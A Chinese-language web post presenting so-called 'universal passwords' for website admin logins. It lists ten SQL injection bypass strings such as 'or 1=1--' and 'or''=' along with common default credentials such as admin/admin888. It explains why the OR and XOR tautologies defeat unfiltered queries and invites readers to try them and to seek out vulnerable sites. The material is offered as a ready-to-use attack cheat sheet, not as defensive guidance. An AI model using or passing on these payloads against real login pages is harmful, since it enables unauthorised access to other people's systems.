web后台常用的万能密码

网站后台万能密码就是在用户名与密码处都写入下列字符，如果知道管理员帐号的话直接添帐号，效果会更好。
例如我们要利用第一条就是:
用户名:"or “a”="a
密码:"or “a”="a

---

1："or “a”="a
2： ‘.).or.(’.a.’=’.a
3：or 1=1–
4：‘or 1=1–
5：a’or’ 1=1–
6："or 1=1–
7：‘or.‘a.’=‘a
8：“or”="a’=‘a
9：‘or’’=’
10：‘or’=‘or’

原理都是利用SQL语法来利用注入，其实这也是注入的一种，都是因为提交字符未加过滤或过滤不严而导致的。
其实万能是没有的，默认是很多的。
admin
admin
admin
admin888
少数ASP网页后面登陆时可以用密码1’or’1’=‘1(用户名用admin等试)登陆成功。这一般也是SQL注入的第一课，原理涉及到SQL语句……验证登陆时，如果密码=输入的密码，那么登陆成功，把1’ or ‘1’='1带入即“如果密码=1或者1=1那么登成功”由于1=1恒成立，且“密码=1”与“1=1”是逻辑或的关系，则整句为TRUE，即登陆成功。这样说懂不？
其实后台万能登陆密码这个称号真的不那么专业，或许叫做“后台验证绕过语句”还好些，不过前者叫得普遍些。
这个语句就是’xor

xor估计很多人都知道，或者听说过，不就是异或么，他和or以及and都是一样的，但是or进行的是或运算，and进行的是与运算，异或xor则是不等的则是真，即比较的两个值不相同的就对，相同的就错，我搜了一下网上，几乎没有过滤参数，可以用经典’or’='or’进去的，‘xor都可以进去，大家可以尝试一下。
对网站万能密码’or’='or’的浅解
‘or’='or’漏洞是一个比较老的漏洞了,主要是出现在后台登录上,利用这个漏洞,我们可以不用输入密码就直接进入系统的后台.它出现的原因是在编程时逻辑上考虑不周,同时对单引号没有进行过滤,从而导致了漏洞的出现.先给大家简单介绍下漏洞的原理吧,只要大家搞懂了原理,就可以自己去找这样漏洞的系统了。